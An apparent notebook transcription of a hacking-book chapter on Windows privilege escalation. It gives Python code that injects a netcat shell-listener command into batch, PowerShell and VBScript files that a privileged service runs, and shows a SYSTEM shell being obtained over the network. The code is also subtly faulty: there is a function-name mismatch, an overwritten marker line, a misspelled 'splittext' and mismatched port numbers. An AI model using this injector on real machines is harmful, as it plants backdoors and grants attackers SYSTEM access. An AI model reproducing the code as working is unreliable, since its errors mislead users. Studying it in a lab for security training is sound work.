<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C10-Windows_Privilege_Escalation/Code_Injection.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__Code Injection__*

Now that we can monitor processes and file locations, we'll automatically inject code into target files. We'll create very simple code snippets that spawn a compiled version of the __netcat.py__ tool with the privilege level of the originating service. There is a vast array of nasty things you can do with these VBScript, batch, and PowerShell files. We'll create the general framework, and you can run wild from there. Modify the __file_monitoring.py__ script and add the following code after the file modification constants:

```
NETCAT = 'c:\\users\\tim\\work\\netcat.exe'
TGT_IP = '192.168.1.208'
CMD = f'{NETCAT} -t {TGT_IP} -p 9999 -l -c '
```

The code we're about to inject will use these constants: __TGT_IP__ is the IP address of the victim (the Windows box we're injeting code into) and __TGT_PORT__ is the port we'll connect to. The __NETCAT__ variable gives the location of the Netcat substitute we coded in Chapter 2. If you haven't created an executable from that code, you can do so now:

```
C:\Users\tim\netcat> pyinstaller -F netcat.py
```

Then drop the resulting __netcat.exe__ file into your directory and make sure the __NETCAT__ variable points to that executable.

The command our injected code will execute creates a reverse command shell:

In [ ]:
FILE_TYPES = { #[1]
    '.bat': ['\r\nREM bhpmarker\r\n', f'\r\n{CMD}\r\n'],
    '.ps1': ['\r\n#bhpmarker\r\n', f'\r\nStart-Process "{CMD}"\r\n'],
    '.vbs': ['\r\n#bhpmarker\r\n', f'\r\nCreateObject("Wscript.Shell").Run("{CMD}")\r\n'],
}

def injected_code(full_filename, contents, extension):
    if FILE_TYPES[extension][0].strip() in contents: #[2]
        return

    full_contents = FILE_TYPES[extension][0] #[3]
    full_contents = FILE_TYPES[extension][1]
    full_contents += contents
    with open(full_filename, 'w') as f:
        f.write(full_contents)
    print('\\o/ Injected Code')

We start by defining a dictionary of code snippets that match a particular file extension __[1]__. The snippet include a unique marker and the code we want to inject. The reason we use a marker is to avoid an infinite loop whereby we see a file modification, insert our code, and cause the program to detect this action as a file modification event. Left alone, this cycle would continue until the file gets gigantic and the hard drive begins to cry. Instead, the program will check for the marker and, if it finds it, know not to modify the fila a second time.

Next, the __inject_code__ function handles the actual code injection and file marker checking. After we verify that the marker doesn't exist __[2]__, we write the marker and the code we want the target process to run __[3]__. Now we need to modify our main event loop to include our file extension check and the call to __inject_code__:

In [ ]:
#[...]

                elif action == FILE_MODIFIED:
                    extension = os.path.splittext(full_filename)[1] #[1]

                if extension in FILE_TYPES: #[2]
                    print(f'[*] Modified {full_filename}')
                    print('[vvv] Dumping contents ...')
                    try:
                        with open(full_filename) as f:
                            contents = f.read()
                        # NEW CODE
                        inject_code(full_filename, contents, extension)
                        print(contents)
                        print('[^^^] Dump complete.')
                    except Exception as e:
                        print(f'[!!!] Dump failed. {e}')

#[...]

This is a pretty straighforward addition to the primary loop. We do a quick split of the file extension __[1]__ and then check it against our dictionary of known file types __[2]__. If the file extension is detected in the dictionary, we call the __inject_code__ function. Let's take it for a spin.

### *__Kicking the Tires__*

If you installed the __bhservice__ at the beginning of this chapter, you can easily test your fancy new code injector. Make sure the service is running and then execute your __file_monitor.py__ script. Eventually, you should see output indicating that a __.vbs__ file has been created and modified and that code has been injected. In the following example, we've commented out the printing of the contents to save space:

```
[*] Modified c:\Windows\Temp\bhservice_task.vbs
[vvv] Domping contents ...
\o/ Injected Code
[^^^] Dump complete.
```

If you open a new cmd window, you should see that the target port is open:

```
c:\Users\tim\work> netstat -an |findstr 999
  TCP    192.168.1.208:999      0.0.0.0:0       LISTENING
```

If all went well, you can use the __nc__ command or run the __netcat.py__ script from Chapter 2 to connect the listener you just spawned. To make sure your privilege escalation worked, connect to the listener from your Kali machine and check which user you're running as:

```
$ nc -nv 192.168.1.208 9999
Connection to 192.168.1.208 port 9999 [tcp/*] succeeded!
#> whoami
nt authority\system
#> exit
```

This should indicate that you've obtained the privileges of the holy SYSTEM account. Your code injection worked.

You may have reached the end of this chapter thinking that some of these attacks are a bit esoteric. But if you spend enough time inside a large enterprise, you'll realize these tactics are quite viable. You can easily expand the tooling in this chapter, or turn it into specialty scripts to compromise a local account or application. WMI alone can be an excellent source of local recon data; it can enable you to further an attack once you're inside a network. Privilege escalation is an essential piece to any good trojan.